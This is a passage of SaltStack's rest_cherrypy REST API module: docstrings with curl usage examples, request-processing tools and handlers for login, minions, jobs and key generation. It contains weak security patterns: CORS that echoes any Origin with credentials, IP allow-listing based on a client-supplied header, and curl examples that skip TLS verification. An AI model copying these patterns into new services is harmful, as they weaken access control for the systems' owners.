"instances": "my-centos-6",
"image": "ami-1624987f",
"delvol_on_destroy", true
}
]
'
HTTP/1.1 200 OK
[...snip...]
{
"return": [
{
"jerry": {
"pkg_|-install_apache_|-httpd_|-installed": {
[...snip full state return here...]
}
}
[...snip other minion returns here...]
},
{
[...snip full salt-cloud output here...]
}
]
}
Content negotiation
-------------------
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
We recommend the JSON format for most HTTP requests. urlencoded data is simple
and cannot express complex data structures -- and that is often required for
some Salt commands, such as starting a state run that uses Pillar data. Salt's
CLI tool can reformat strings passed in at the CLI into complex data
structures, and that behavior also works via salt-api, but that can be brittle
and since salt-api can accept JSON it is best just to send JSON.
Here is an example of sending urlencoded data:
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-d client=runner \\
-d fun='jobs.lookup_jid' \\
-d jid='20150129182456704682'
.. admonition:: urlencoded data caveats
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
query string parameters. E.g., ``?foo[]=fooone&foo[]=footwo``. This is
**not** supported; send ``?foo=fooone&foo=footwo`` instead, or send JSON
or YAML.
A note about ``curl``
The ``-d`` flag to curl does *not* automatically urlencode data which can
affect passwords and other data that contains characters that must be
encoded. Use the ``--data-urlencode`` flag instead. E.g.:
.. code-block:: bash
curl -ksi http://localhost:8000/login \\
-H "Accept: application/json" \\
-d username='myapiuser' \\
--data-urlencode password='1234+' \\
-d eauth='pam'
Performance Expectations and Recommended Usage
==============================================
This module provides a thin wrapper around :ref:`Salt's Python API
<python-api>`. Executing a Salt command via rest_cherrypy is directly analogous
to executing a Salt command via Salt's CLI (which also uses the Python API) --
they share the same semantics, performance characteristics, and 98% of the same
code. As a rule-of-thumb: if you wouldn't do it at the CLI don't do it via this
API.
Long-Running HTTP Connections
-----------------------------
The CherryPy server is a production-ready, threading HTTP server written in
Python. Because it makes use of a thread pool to process HTTP requests it is
not ideally suited to maintaining large numbers of concurrent, synchronous
connections. On moderate hardware with default settings it should top-out at
around 30 to 50 concurrent connections.
That number of long-running, synchronous Salt processes is also not ideal. Like
at the CLI, each Salt command run will start a process that instantiates its
own ``LocalClient``, which instantiates its own listener to the Salt event bus,
and sends out its own periodic ``saltutil.find_job`` queries to determine if a
Minion is still running the command. Not exactly a lightweight operation.
Timeouts
--------
In addition to the above resource overhead for long-running connections, there
are the usual HTTP timeout semantics for the CherryPy server, any HTTP client
being used, as well as any hardware in between such as proxies, gateways, or
load balancers. rest_cherrypy can be configured not to time-out long responses
via the ``expire_responses`` setting, and both :py:class:`LocalClient
<salt.client.LocalClient>` and :py:class:`RunnerClient
<salt.runner.RunnerClient>` have their own timeout parameters that may be
passed as top-level keywords:
.. code-block:: bash
curl -b /tmp/cookies.txt -sSi localhost:8000 \
-H 'Content-type: application/json' \
-d '
[
{
"client": "local",
"tgt": "*",
"fun": "test.sleep",
"kwarg": {"length": 30},
"timeout": 60
},
{
"client": "runner",
"fun": "test.sleep",
"kwarg": {"s_time": 30},
"timeout": 60
}
]
'
Best Practices
--------------
Given the performance overhead and HTTP timeouts for long-running operations
described above, the most effective and most scalable way to use both Salt and
salt-api is to run commands asynchronously using the ``local_async``,
``runner_async``, and ``wheel_async`` clients.
Running asynchronous jobs results in being able to process 3x more commands per second
for ``LocalClient`` and 17x more commands per second for ``RunnerClient``, in
addition to much less network traffic and memory requirements. Job returns can
be fetched from Salt's job cache via the ``/jobs/<jid>`` endpoint, or they can
be collected into a data store using Salt's :ref:`Returner system <returners>`.
The ``/events`` endpoint is specifically designed to handle long-running HTTP
connections and it exposes Salt's event bus which includes job returns.
Watching this endpoint first, then executing asynchronous Salt commands second,
is the most lightweight and scalable way to use ``rest_cherrypy`` while still
receiving job returns in real-time. But this requires clients that can properly
handle the inherent asynchronicity of that workflow.
Performance Tuning
------------------
The ``thread_pool`` and ``socket_queue_size`` settings can be used to increase
the capacity of rest_cherrypy to handle incoming requests. Keep an eye on RAM
usage as well as available file handles while testing changes to these
settings. As salt-api is a thin wrapper around Salt's Python API, also keep an
eye on the performance of Salt when testing.
Future Plans
------------
Now that Salt uses the Tornado concurrency library internally, we plan to
improve performance in the API by taking advantage of existing processes and
event listeners and to use lightweight coroutines to facilitate more
simultaneous HTTP connections and better support for synchronous operations.
That effort can be tracked in `issue 26505`__, but until that issue is closed
rest_cherrypy will remain the officially recommended REST API.
.. __: https://github.com/saltstack/salt/issues/26505
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |400| replace:: bad or malformed request
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
"""
import functools
import io
import itertools
import logging
import os
import signal
import tarfile
from collections.abc import Iterator, Mapping
from multiprocessing import Pipe, Process
from urllib.parse import parse_qsl
import cherrypy # pylint: disable=import-error,3rd-party-module-not-gated
import salt
import salt.auth
import salt.exceptions
import salt.netapi
import salt.utils.event
import salt.utils.json
import salt.utils.stringutils
import salt.utils.versions
import salt.utils.yaml
logger = logging.getLogger(__name__)
try:
from cherrypy.lib import ( # pylint: disable=import-error,3rd-party-module-not-gated
cpstats,
)
except AttributeError:
cpstats = None
logger.warn(
"Import of cherrypy.cpstats failed. "
"Possible upstream bug: "
"https://github.com/cherrypy/cherrypy/issues/1444"
)
except ImportError:
cpstats = None
logger.warn("Import of cherrypy.cpstats failed.")
try:
# Imports related to websocket
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type("websockets", (object,), {"SynchronizingWebsocket": None})
HAS_WEBSOCKETS = False
def html_override_tool():
"""
Bypass the normal handler and serve HTML for all URLs
The ``app_path`` setting must be non-empty and the request must ask for
``text/html`` in the ``Accept`` header.
"""
apiopts = cherrypy.config["apiopts"]
request = cherrypy.request
url_blacklist = (
apiopts.get("app_path", "/app"),
apiopts.get("static_path", "/static"),
)
if "app" not in cherrypy.config["apiopts"]:
return
if request.path_info.startswith(url_blacklist):
return
if request.headers.get("Accept") == "*/*":
return
try:
wants_html = cherrypy.lib.cptools.accept("text/html")
except cherrypy.HTTPError:
return
else:
if wants_html != "text/html":
return
raise cherrypy.InternalRedirect(apiopts.get("app_path", "/app"))
def salt_token_tool():
"""
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
"""
x_auth = cherrypy.request.headers.get("X-Auth-Token", None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie["session_id"] = x_auth
def salt_api_acl_tool(username, request):
"""
.. versionadded:: 2016.3.0
Verifies user requests against the API whitelist. (User/IP pair)
in order to provide whitelisting for the API similar to the
master, but over the API.
..code-block:: yaml
rest_cherrypy:
api_acl:
users:
'*':
- 1.1.1.1
- 1.1.1.2
foo:
- 8.8.4.4
bar:
- '*'
:param username: Username to check against the API.
:type username: str
:param request: Cherrypy request to check against the API.
:type request: cherrypy.request
"""
failure_str = "[api_acl] Authentication failed for " "user {0} from IP {1}"
success_str = "[api_acl] Authentication successful for user {0} from IP {1}"
pass_str = "[api_acl] Authentication not checked for " "user {0} from IP {1}"
acl = None
# Salt Configuration
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
# Cherrypy Config.
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
# ACL Config.
acl = cherrypy_conf.get("api_acl", None)
ip = request.remote.ip
if acl:
users = acl.get("users", {})
if users:
if username in users:
if ip in users[username] or "*" in users[username]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
elif username not in users and "*" in users:
if ip in users["*"] or "*" in users["*"]:
logger.info(success_str.format(username, ip))
return True
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(failure_str.format(username, ip))
return False
else:
logger.info(pass_str.format(username, ip))
return True
def salt_ip_verify_tool():
"""
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
"""
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get("saltopts", None)
if salt_config:
cherrypy_conf = salt_config.get("rest_cherrypy", None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get("authorized_ips", None)
if auth_ip_list:
logger.debug("Found IP list: {}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get("Remote-Addr", None)
logger.debug("Request from IP: {}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {}".format(rem_ip))
raise cherrypy.HTTPError(403, "Bad IP")
def salt_auth_tool():
"""
Redirect all unauthenticated requests to the login page
"""
# Redirect to the login page if the session hasn't been authed
if "token" not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers["Cache-Control"] = "private"
def cors_tool():
"""
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
"""
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head["Access-Control-Allow-Origin"] = req_head.get("Origin", "*")
resp_head["Access-Control-Expose-Headers"] = "GET, POST"
resp_head["Access-Control-Allow-Credentials"] = "true"
# Non-simple CORS preflight request; short-circuit the normal handler.
if cherrypy.request.method == "OPTIONS":
ac_method = req_head.get("Access-Control-Request-Method", None)
allowed_methods = ["GET", "POST"]
allowed_headers = [
"Content-Type",
"X-Auth-Token",
"X-Requested-With",
]
if ac_method and ac_method in allowed_methods:
resp_head["Access-Control-Allow-Methods"] = ", ".join(allowed_methods)
resp_head["Access-Control-Allow-Headers"] = ", ".join(allowed_headers)
resp_head["Connection"] = "keep-alive"
resp_head["Access-Control-Max-Age"] = "1400"
# Note: CherryPy on Py3 uses binary objects for the response
# Python 2.6 also supports the byte prefix, so no need for conditionals
cherrypy.response.body = b""
cherrypy.response.status = 200
# CORS requests should short-circuit the other tools.
cherrypy.serving.request.handler = None
# Needed to avoid the auth_tool check.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session["token"] = True
return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
("application/json", salt.utils.json.dumps),
(
"application/x-yaml",
functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
),
)
def hypermedia_handler(*args, **kwargs):
"""
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
"""
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (
salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError,
):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (
salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError,
) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc: # pylint: disable=broad-except
# The TimeoutError exception class was removed in CherryPy in 12.0.0, but
# Still check existence of TimeoutError and handle in CherryPy < 12.
# The check was moved down from the SaltClientTimeout error line because
# A one-line if statement throws a BaseException inheritance TypeError.
if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug(
"Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True,
)
cherrypy.response.status = 500
ret = {
"status": cherrypy.response.status,
"return": "{}".format(traceback.format_exc(exc))
if cherrypy.config["debug"]
else "An unexpected error occurred",
}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers["Content-Type"] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
return salt.utils.stringutils.to_bytes(response)
except Exception: # pylint: disable=broad-except
msg = "Could not serialize the return data from Salt."
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
"""
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
"""
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
"""
A decorator to skip a processor function if process_request_body is False
"""
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
"""
Accept x-www-form-urlencoded data and reformat it into a Low State
data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
"""
# cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
# "body", so we have to handle parsing the tokens using parse_qsl
urlencoded = entity.read()
try:
urlencoded = urlencoded.decode("utf-8")
except (UnicodeDecodeError, AttributeError):
pass
cherrypy.serving.request.raw_body = urlencoded
cherrypy.serving.request.unserialized_data = dict(parse_qsl(urlencoded))
@process_request_body
def json_processor(entity):
"""
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid JSON document")
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
"""
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, "Invalid YAML document")
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
"""
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
"""
# https://github.com/cherrypy/cherrypy/pull/1572
contents = io.BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
"""
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
"""
# Be liberal in what you accept
ct_in_map = {
"application/x-www-form-urlencoded": urlencoded_processor,
"application/json": json_processor,
"application/x-yaml": yaml_processor,
"text/yaml": yaml_processor,
"text/plain": text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (
cherrypy.request.method.upper() == "POST"
and cherrypy.request.headers.get("Content-Length", "0") == "0"
):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, "Content type not supported"
)
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
"""
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
"""
if cherrypy.request.method.upper() != "POST":
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, Mapping):
# Make the 'arg' param a list if not already
if "arg" in data and not isinstance(
data["arg"], list
): # pylint: disable=unsupported-membership-test
data["arg"] = [data["arg"]]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
"on_start_resource": [
("html_override", html_override_tool),
("salt_token", salt_token_tool),
],
"before_request_body": [
("cors_tool", cors_tool),
("salt_auth", salt_auth_tool),
("hypermedia_in", hypermedia_in),
],
"before_handler": [
("lowdata_fmt", lowdata_fmt),
("hypermedia_out", hypermedia_out),
("salt_ip_verify", salt_ip_verify_tool),
],
}
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(
cherrypy.tools, tool_name, cherrypy.Tool(hook, tool_fn, priority=(50 + idx))
)
###############################################################################
class LowDataAdapter:
"""
The primary entry point to Salt's REST API
"""
exposed = True
_cp_config = {
"tools.salt_token.on": True,
"tools.sessions.on": True,
"tools.sessions.timeout": 60 * 10, # 10 hours
# 'tools.autovary.on': True,
"tools.hypermedia_out.on": True,
"tools.hypermedia_in.on": True,
"tools.lowdata_fmt.on": True,
"tools.salt_ip_verify.on": True,
}
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
"""
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
"""
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get("tools.sessions.on", False):
cherrypy.session.release_lock()
# if the lowstate loaded isn't a list, lets notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, "Lowstates must be a list")
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk["token"] = token
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if "token" in chunk:
# Make sure that auth token is hex
try:
int(chunk["token"], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, "Invalid token")
if client:
chunk["client"] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if "arg" in chunk and not isinstance(chunk["arg"], list):
chunk["arg"] = [chunk["arg"]]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, Iterator):
yield from ret
else:
yield ret
@cherrypy.config(**{"tools.sessions.on": False})
def GET(self):
"""
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
"""
return {
"return": "Welcome",
"clients": salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
"""
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
"""
return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
"""
Convenience URLs for working with minions
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
"""
cherrypy.request.lowstate = [
{"client": "local", "tgt": mid or "*", "fun": "grains.items"}
]
return {
"return": list(self.exec_lowstate(token=cherrypy.session.get("token"))),
}
def POST(self, **kwargs):
"""
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
"""
job_data = list(
self.exec_lowstate(
client="local_async", token=cherrypy.session.get("token")
)
)
cherrypy.response.status = 202
return {
"return": job_data,
"_links": {
"jobs": [{"href": "/jobs/{}".format(i["jid"])} for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def GET(self, jid=None, timeout=""): # pylint: disable=arguments-differ
"""
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
if "return" in returns[minion]:
minion_ret[minion] = returns[minion].get("return")
else:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>`.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
